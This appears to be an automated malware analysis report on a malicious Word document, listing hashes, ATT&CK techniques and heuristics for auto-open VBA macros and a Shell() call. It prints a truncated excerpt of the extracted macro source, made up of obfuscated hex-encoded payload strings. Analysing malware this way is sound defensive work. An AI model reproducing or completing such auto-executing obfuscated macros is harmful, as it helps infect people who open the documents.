Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e86b59a806910e2d…

MALICIOUS

Office (OLE)

143.5 KB Created: 2018-03-21 22:52:00 Authoring application: Microsoft Office Word First seen: 2018-11-05
MD5: 4e3fab21a063150233e4780b8c4bb61f SHA-1: 02f535684a147dc5c1657459833b3b7bd9d480a7 SHA-256: e86b59a806910e2d7d901f50085d78305dbb8f18eafde4e4f6b4c0153e0c7017
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an Office document containing VBA macros, specifically triggering Document_Open and Workbook_Open events. The critical OLE_VBA_SHELL heuristic indicates the use of the Shell() function, which is commonly used to download and execute secondary payloads. The ClamAV detection further confirms its malicious nature. No specific family could be identified, but the macro execution pattern is a strong indicator of a downloader or initial access stage.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18798 bytes
SHA-256: 10b135242041643c577e6025c9739593cf65f9debff015026c8ed23d0a56b9a2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 66 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Public Sub E_ZT()
   Dim QI_AEG As String
   Dim IS_HTV As String
   Dim L_IB As String
L_IB = "5788761D4257575720577B575777575A5757577C9646524A5757494A575786272D4E8A317C575745573A57885D5757592D57571E51578A4E445A5C935757834D6C57575720405633574F57245757955757575730572057856B78573A788A8A5757753457795751575E578C1A577E5782576F57572A6A576357405F5"
Dim T_VG As String
T_VG = "753345738577D6C615757576557575757575757752057967C57573651755757411C6C5585295D572357532933575757715757574E345757576A573E5D575757574457576A5457577B5757316A571C57578269353957395757879163575757578F4779956257848D575757245757605757836655963A935757575757"
Dim C_PE As String
C_PE = "577B575723573A625788575757571C2C2D4C3F5777975757966D5757578E4757573C57571857323D747D576A5757575757575757571B441E89896486575757578B418957272C7C32198E57574C725757573234575757573857575757571857579132335757729657912157572E5757578C575B4E577E692D39573C6"
Dim R_EM As String
R_EM = "46157705757577B57575757742F2D612E1D339057623671575767402A571E88244D4A88573B3A574A575757345737573452281D24921942677657787D68572F963E57917D5757578F8E578457574757575757825757485D576A75573B57574357575257574524341A575757574857726E575796835777572B574E57"
Dim HF_AEG As String
HF_AEG = "572C57582D576A5757755772575784576F57578640366C57575757575767841A576258575332205757675757261C715830578D2757873957853E57573757576357576B57576F54965790575790576A57574A5775294757363157577A575757207F83971D5757645057574557573757576B91576C57576C908B90576"
Dim GY_ET As String
GY_ET = "0337157299251251E6557225757341A5C5757576C27405E8B6691574257522557578D5757573B57571D575786303A8C6A4B579557572448735744574B575757573A576E578F57752D572157571C4E6E7C57716057295781824657573D57575D2757637F5757578B5780574F1A5757575781571A7F66842957572E61"
Dim C_T As String
C_T = "577D575557578A5257578857573F69577E575766195757575733525757575747905752565577573E57761C57575C57577357577C4C705A573696345757856257575740964D85575757743C57925770575729575B425770575879224A574F3057577C76579634576F5757575F1B706B2957515784575757575724575"
Dim ZT_LWS As String
ZT_LWS = "7383D245A5778575775575A576F835757577657571C57783F6657572857572F837C571C925770834B5C8D57633F1A575757365719333E5732525784575757565818819757576657571A575757577A57572D6756575757805777775759233F578B1D577C5B576284578B505757575D57577442574257245769575789"
Dim IW_P As String
IW_P = "72197D575757574C577B1D572B8D1F57245732575757578F8657573C2A572B572A5725587E575A5757677157575757576F9421572E215757578B3A576744576C80573337577657523F31572C4A7B575A32755757575741747F57458D57578F96575A455786265757577057558857435757575740575757573648975"
Dim BAL_WTG As String
BAL_WTG = "779576691574D575757675725574B4337571919575757578A576A50575757572147577357575757526A49573A335757895757344757578E33931E645790575777571B57535748578223668057576F57576E57572B6457578B57622A5757555A7A2F1984578757573C5793574F577951575857573F57825757572637"
Dim IXT_FW As String
IXT_FW = "5757579457645757553C574E388C835757205759575727925857533F575729575757433357585796878F575771578357575757572D574D379449545729306C572A4C5757606719578A40578A5738916157575757575757752457571C57856F3B88923D5A57814D57892D5757575A5728BA578E705757574754577C5"
Dim XIH_ZM As String
XIH_ZM = "7579266851F574E8237847A628C57575757591E575757575744574D576549578D57572D574F7F2157572C578A225757575757572E865757575745713E977E3C57578F5757965757335757305792755757745757205757938C39574357806889956E7857576EC757515757508557573A964B5757576B225723575755"
Dim S_PX As String
S_PX = "5757553B573F571E3D596F57576957535757576B5D575657965757642457576257245757615797183370574E57819257192B85575757815757847057573057576F6C5D5758823E1B6A4291645760577C3C9523576B57575B5767577E3F1E78586B57573C57575757816057673457755757575425265B575719615757576457515757811B5857578C57577E57578D575F574B473C4A5C574E573A6C57574557571C2E3B575757
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.